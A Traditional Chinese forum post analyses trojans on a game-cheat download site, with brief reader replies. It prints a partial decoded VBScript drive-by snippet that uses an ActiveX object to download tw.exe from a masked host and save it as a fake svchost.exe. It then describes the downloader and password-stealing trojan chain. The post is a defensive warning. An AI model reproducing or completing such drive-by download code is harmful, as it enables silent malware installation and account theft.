風雲外掛網中的木馬分析

風雲工作室提供大量繁體外掛資訊，通知對風雲源碼分析，此網站與我們公佈的“365遊戲輔助工具”假外掛網為同一人製作。使用的木馬程式也一樣。

以下為此網站如何讓會員中木馬。
聯合國對風雲網的代碼解密，發現此網站在網頁中加入了VBS代碼（腳本技術），自動下載，執行木馬程式tw.exe與svchost.exe（正常svchost.exe是在WINDOWS\system32中），以下為解密後的一段代碼：（為了安全只公佈一段）

1. <script language="VBScript.Encode">
   
2. y = "http://www.XXXX.com/ief/lr/tw.exe"
   
3. m4="down"
   
4. m5="file"
   
5. m6="copy"
   
6. m7="exit"
   
7. Set yc = document.createElement("object")
   
8. yc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
   
9. ................
   
10. yd.Open yh, y, False
    
11. yd.Send
    
12. y9="svchost.exe"
    
13. set yb = yc.createobject("Scripting.FileSystemObject","")
    
14. set ye = yb.GetSpecialFolder(2)
    
15. ................

複製代碼

以上是“風雲工作室”使用的自動下載，開啟木馬的源碼。

如何防範像“風雲工作室”一樣的網站？
修復windows的最新漏洞就可以防範木馬網站自動下載木馬程式的腳本執行。

木馬程式分析。
svchost.exe分析：
此程式是“風雲工作室”網站的htm代碼，你執行此程式時會自動重複下載最新的木馬程式。
tw.exe分析：
木馬下載程式（Trojan-Downloader），此程式是用來自動下載最新盜號木馬程式（Trojan-PSW）。
現在我拿到的tw.exe會自動下載，執行servnet.exe木馬程式到WINDOWS\system32，自動執行servnet.exe後會修改IE瀏覽器來更新盜號木馬程式

謝謝安南版主
趕快來去更新WINDOWS..

請問...如果中了svchost怎麼解毒阿??
我好像中了...希望大大幫個忙...yociexp171.gif

太危險了!好在有安大的熱心!